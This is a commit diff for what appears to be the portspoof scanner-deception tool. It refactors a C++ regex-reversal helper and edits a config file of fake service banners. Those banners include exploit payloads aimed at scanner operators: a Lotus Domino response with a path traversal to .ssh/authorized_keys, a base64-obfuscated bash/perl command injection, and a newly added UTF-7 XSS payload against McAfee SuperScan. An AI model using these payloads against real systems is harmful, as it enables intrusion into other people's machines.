improvements - latest

src/Configuration.h

@@ -40,7 +40,6 @@
 
 #define CONFSEPARATOR "/"
 #define DEFAULT_PORT 4444
-#define BUFSIZE 1024
 
 #define LOG_FILE "portspoof.log"
 #define CONF_FILE "portspoof.conf"

src/config_files/portspoof.conf

@@ -99,6 +99,8 @@
 80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n<html>\r\n<body><a href=\x22user-UserID\x22>\r\n<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fUsers\x2fpduszynski\x2f\.ssh\x2fauthorized_keys\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a\x22>\r\a\r\n<a href=\x22\%?OpenDocumentddddd\x22>\r\n<form action=\x22aaa?ReadForm&\x22>\r\n</body>\r\n</html>\r\n\x0d\x0a\x0d\x0a"
 
 #OS cmd injection payload for bash: $(cat output) and `cat output` injections
-
 9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));"
 
+#McAffe SuperScan UTF7 XSS payload
+1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
+

src/mainrevregex.cpp

@@ -12,10 +12,56 @@
 #include <pthread.h>
 #include <unistd.h>
 
+
 using namespace std;
 
 
-string revregexn(string str)
+std::vector<char> str2vector( std::string s)
+{
+	std::vector<char> result_vector;
+	
+	for(int i=0; i<s.length();i++)
+		result_vector.push_back(s[i]);
+		
+	return result_vector;
+	
+	
+}
+
+std::vector<char> cutvector(std::vector<char> str,int start_offset, int end_offset)
+{
+
+	std::vector<char> result_vector;
+
+
+	for(int i=start_offset;i<=end_offset;i++)
+			result_vector.push_back(str[i]);
+
+	
+		return result_vector;
+
+}
+
+
+std::vector<char> mergevector(std::vector<char> str,std::vector<char> str2)
+{
+
+	std::vector<char> result_vector;
+
+	for(int i=0;i<str.size();i++)
+		result_vector.push_back(str[i]);
+	
+	for(int i=0;i<str2.size();i++)
+		result_vector.push_back(str2[i]);
+
+	return result_vector;
+
+}
+
+
+
+
+std::vector<char> revregexn(std::vector<char> str)
 {
 
 	//defines
@@ -24,59 +70,112 @@ string revregexn(string str)
 	char lbrak='[';
 	char rbrak=']';
 	char bslash='\\';
-	//
 
+	std::vector<char> result_vector=str;
+	std::vector<char> tmp;
 
-	stringstream ss;	
-	std::vector<char> result_vector;
-	std::string::iterator lastcut=str.begin();
-	std::string::iterator iter1;
-	std::string::iterator iter2;
-	string result_string=str;
-
-	for(iter1=str.begin();iter1<str.end();iter1++) // remove () [regex special char.] from  the string
+	repeat_remove:
+	tmp.clear();
+	
+	for(int i=0;i<result_vector.size();i++) // remove parenthises
 	{
-		if(*iter1==lnaw && ( (iter1 == str.begin() ) || *(iter1-1)!=bslash))
+		if(result_vector[i]==lnaw && ( (i == 0 ) || result_vector[i-1]!=bslash))
 		{
-			ss<<str.substr(lastcut - str.begin(),iter1 - str.begin());
 
-			for(iter2=iter1;iter2<str.end();iter2++)
+			for(int j=i;j<result_vector.size();)
 			{
-				if(*iter2==rnaw && *(iter2-1)!=bslash ){
+				if(result_vector[j]==rnaw && result_vector[j-1]!=bslash ){
 					
-					ss<<str.substr(iter1+1 - str.begin(),iter2-2-str.begin());
-					lastcut=iter2;
-					iter1=iter2;
-					break;
+					tmp=mergevector(tmp,cutvector(result_vector,0,i-1));
+					tmp=mergevector(tmp,cutvector(result_vector,i+1,j-1));
+					tmp=mergevector(tmp,cutvector(result_vector,j+1,result_vector.size()-1));
+					result_vector=tmp;
+					goto repeat_remove;
+					}
+
+				j++;
+
+				if(j==result_vector.size())
+				{
+
+				fprintf(stdout,"Regex error : !!");
+				
+				for(int k=0;k<result_vector.size();k++)
+					cout<<result_vector[k];
+				cout<<endl;
 				}
-				//fprintf(stdout,"Regex error %s !! \n",str.c_str());
 			}
 
 		}
 
 	}
 
-	//process results
+	repeat_remove2:
+	tmp.clear();
 
-	if(iter1==str.end())
+	for(int i=0;i<result_vector.size();i++) // 
 	{
-		ss<<str.substr(lastcut +1 - str.begin(),iter1-str.begin());
-		result_string=ss.str();
+		if(result_vector[i]==lbrak && ( (i == 0 ) || result_vector[i-1]!=bslash))
+		{
+
+			for(int j=i;j<result_vector.size();)
+			{
+				if(result_vector[j]==rbrak && result_vector[j-1]!=bslash ){
+					
+					tmp=mergevector(tmp,cutvector(result_vector,0,i-1));
+					tmp=mergevector(tmp,cutvector(result_vector,i+1,j-1));
+					tmp=mergevector(tmp,cutvector(result_vector,j+1,result_vector.size()-1));
+					result_vector=tmp;
+					goto repeat_remove2;
+					}
+
+				j++;
+
+				if(j==result_vector.size())
+				{
+
+				fprintf(stdout,"Regex error : !!");
+				
+				for(int k=0;k<result_vector.size();k++)
+					cout<<result_vector[k];
+				cout<<endl;
+				}
+			}
+
+		}
 
 	}
-
-
-	return result_string;
+	return result_vector;
 }
 
 
 int main(int argc, char **argv)
 {
 
-string s ="1(234)567\n";
-cout<<revregexn(s);
+std::vector<char> result_vector1;
+std::vector<char> result_vector;
+
+
+string s ="123[xxx]sfssf\n";
+
+result_vector=revregexn(str2vector(s));
+
+for(int i=0;i<result_vector.size();i++)
+	cout<<result_vector[i];
+
+
+
+s ="(1xx)\n";
+
+result_vector=revregexn(str2vector(s));
+
+for(int i=0;i<result_vector.size();i++)
+	cout<<result_vector[i];
+
+/*
 s ="(1234)5\n";
 cout<<revregexn(s);
+*/
 
 return 0;
 

src/revregex.h

@@ -47,7 +47,7 @@
 
 using namespace std;
 
-#define BUFSIZE 1024
+#define BUFSIZE 2048
 #define SIGNATURES_SIZE 65535 // max port range
 
 std::vector<char> process_signature(std::string str);